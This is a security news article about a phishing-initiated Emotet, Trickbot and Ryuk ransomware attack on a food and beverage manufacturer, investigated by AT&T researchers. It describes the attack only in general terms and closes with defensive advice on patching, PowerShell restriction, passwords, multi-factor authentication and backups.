Skipping security updates can have dire consequences
Security experts have provided an insight into how a targeted ransomware attack has taken a food and beverage manufacturer’s network down after hackers managed to exploit common security vulnerabilities.
The malicious actors used a phishing attack method to take advantage of vulnerabilities in old hardware, default passwords, and many other weaknesses in order to introduce Emotet and Trickbot Malware into the compromised system. After doing so, the crooks managed to deliver a ransomware called Ryuk, encrypt the victim’s network and demand a ransom to restore access.
Fortunately , the affected organization quickly called up security experts to investigate the case and restore functionality and did not pay the ransom that the criminals demandеd. Sadly, many organizations which are in a rush to restore their operations are more likely to agree on the ransom demand, especially if they don’t have IT staff at hand.
AT&T cyber security was called up to examine the attack and assist the unidentified manufacturer to handle the incident without paying a ransom, while suffering the least possible disruptions. But if some basic security measures have been initially applied, the business would have likely not become a victim of a ransomware due to simple security vulnerabilities.
Ransomware threats like Ryuk usually are deployed in the final stage of a multi-step attack that firstly introduces some other malware – usually a botnet like Emotet and a powerful multipurpose Trojan like Tickbot.
A lot of multi-step ransomware campaigns usually target remote ports, however, in the described case, the infection started with a phishing attack. According to the AT&T researchers, the targeted user has received a Microsoft Word document that has been labeled as a bill. The user downloaded the document which then performed a malicious code with a command PowerShell and secretly downloaded the Emotet payload into the system.
The cyber attack might have been prevented at this point if PowerShell had been disabled for those users who don’t need it, experts from the security firm explain.
After Emotet’s intrusion, the second stage of the attack continued with the introduction of Trickbot malware, the aim of which was to steal business accounts and cloud services login credentials so that the crooks can have access to other network components.
Using this two-step methodology, the cyber criminals typically can gain control of over a major portion of the network, before delivering the ransomware. The ultimate goal is to make the most of the attack and block as much of crucial data as possible in order to put the attacked organization in their knees and extort money.
In such an event, the response time and the ability to quickly handle the incident is of utmost importance so that the company can regain access to its critical data and start operating again. The downtime and the network repairs come as an aftermath, along with efforts towards future protection, so attackers don’t hit again.
Many companies, however, suffer from cyber attacks, since they don’t take the necessary measures to prevent becoming a ransomware target. One of the simple solutions that experts suggest is to ensure that information security hygiene is well in place. Simple weaknesses that the attackers may take advantage of should be timely eliminated. Not to forget that external data backup copies should be created on a regular basis.
The vulnerabilities that threats like Emotet, Trickbot and Ryuk’s use are well-known, as these are not new threats. Moreover, there are security updates that address them from a long time. Unfortunately, even though such fixes are available from years, there are still organizations that do not implement them.
AT&T researchers add up that such attacks could easily be avoided if strong passwords and multi-factor authentication is used. However, it seems that patch management and protection hygiene remain a challenge for many organizations.
Still, most security professionals will agree that prevention is a better way to deter cyber attacks because not only does it protect the company from falling prey to ransomware or other malware, but also it would almost certainly cost less than dealing with the consequences of an attack, especially if it causes operational harm that could keep the company from running or turn customers back.